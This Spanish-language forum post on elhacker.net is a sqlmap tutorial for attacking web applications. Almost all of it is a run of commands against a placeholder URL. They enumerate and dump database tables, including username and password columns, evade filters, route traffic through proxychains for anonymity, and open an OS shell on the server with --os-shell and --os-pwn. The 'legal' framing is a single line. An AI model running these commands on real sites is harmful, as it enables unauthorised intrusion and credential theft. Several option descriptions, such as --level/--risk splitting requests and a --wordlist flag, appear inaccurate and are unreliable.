elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [TUTORIAL] Cómo romper aplicaciones web con SQLmap (legalmente)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [TUTORIAL] Cómo romper aplicaciones web con SQLmap (legalmente)  (Leído 194 veces)
blckkey

Desconectado Desconectado

Mensajes: 61


Priest


Ver Perfil
[TUTORIAL] Cómo romper aplicaciones web con SQLmap (legalmente)
« en: Ayer a las 10:35 »

Este tutorial es para los que creen que probar SQL Injection es escribir comillas en un campo de texto. Aquí vamos a llevar SQLmap al siguiente nivel. Rápido, directo y sin rodeos.



Preparación del entorno

Primero, asegúrate de tener SQLmap instalado. Si usas Linux:
Código:
sudo apt update && sudo apt install sqlmap

Para Windows, descárgalo desde su página oficial.

(Usa una máquina virtual o VPN para mantenerte seguro mientras experimentas.)


Primer escaneo: Básico pero funcional

Para probar rápidamente si un sitio es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs

-u: La URL objetivo.
--dbs: Enumera las bases de datos disponibles si encuentra vulnerabilidades.



Extracción de información (Bases de datos, tablas y columnas)

Obtener bases de datos:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs

Elegir una base de datos y sacar tablas:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb --tables

Ver columnas de una tabla:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users --columns

Sacar datos (usuarios y contraseñas):
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users -C username,password --dump



Saltarse restricciones (Bypass)

Usar técnicas de evasión:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment

Con ProxyChains para anonimato:
Código:
proxychains sqlmap -u "http://target.com/vuln.php?id=1" --dbs

Dividir peticiones para confundir el análisis de tráfico:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --level=5 --risk=3



Automatizar fuerza bruta

Si quieres probar contraseñas rápidamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --passwords

Prueba diccionarios personalizados:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --wordlist=users.txt



Subir shells (para auditorías internas)

Subir un shell interactivo directamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-shell

Acceder al sistema operativo si el servidor es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-pwn



SQLmap no es solo para encontrar vulnerabilidades; es para entender cómo funcionan las aplicaciones y cómo protegerlas. Si algo no debería estar expuesto, avisa antes de explotarlo.
En línea

"What you call security, I call an invitation..."
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[TUTORIAL] Como Traducir Aplicaciones JAVA Moviles ¡¡
Hacking Mobile
SmartGenius 0 4,419 Último mensaje 11 Mayo 2008, 05:38 am
por SmartGenius
simular inject_here en sqlmap[TUTORIAL + PROXY]
Nivel Web
afdlkglfgfdgfhgf 0 5,032 Último mensaje 11 Febrero 2012, 04:57 am
por afdlkglfgfdgfhgf
WPA y WPA2 al desnudo. Programas + Tutorial propio para romper claves WiFi 2012 « 1 2 3 4 »
Hacking Wireless
doblefoul 35 214,862 Último mensaje 9 Diciembre 2015, 12:09 pm
por monicaml2
Wapiti + Sqlmap en backtrack 5! [Tutorial]
Hacking
CFalcon 0 3,208 Último mensaje 21 Enero 2013, 00:51 am
por CFalcon
como hacer lo que hace sqlmap pero manualmente ?
Hacking
Zeta1337 2 3,034 Último mensaje 14 Noviembre 2015, 22:25 pm
por 2Fac3R
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines